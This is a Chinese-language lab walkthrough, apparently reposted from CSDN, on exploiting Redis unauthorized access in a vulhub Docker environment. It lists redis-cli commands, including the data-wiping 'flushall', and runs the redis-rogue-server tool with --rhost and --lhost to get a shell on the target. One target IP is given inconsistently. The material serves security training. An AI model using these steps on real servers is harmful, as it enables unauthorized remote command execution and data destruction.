欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 锐评 > Redis未授权访问漏洞

Redis未授权访问漏洞

2025/2/23 6:42:23 来源:https://blog.csdn.net/weixin_53736204/article/details/140893378  浏览:    关键词:Redis未授权访问漏洞

Redis未授权访问漏洞

靶场IP:192.168.30.138
kali的IP:192.168.30.129

搭建靶场环境

进入目录:cd/vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps
vi docker-compose.yml  //查看端口和版本号

在这里插入图片描述
开启成功
在这里插入图片描述

安装redis工具

在kali上安装redis进行服务链接

#安装redis
apt-get install redis#redis使用
redis-cli -h 192.168.30.137  -p 6379#redis常见命令(1)查看信息:info(2)删除所有数据库内容:flushall(3)刷新数据库:flushdb(3)(4)看所有键:KEYS *,使用select num可以查看键值数据:(5)设置变量:set test"whoami"(6)config set dir dirpath 设置路径等配置(7)config get dir/dbfilename 获取路径及数据配置信息(8)save保存(9)get 变量,查看变量名称

在这里插入图片描述

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞----->下载以下攻击项目…
https://github.com/n0b0dyCN/redis-rogue-server
可以下载git源码或者压缩包

 git clone https://github.com/n0b0dyCN/redis-rogue-server.git 

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 192.168.30.138 --lhost 192.168.30.129

在这里插入图片描述
然后就可以输入命令获取信息了
在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词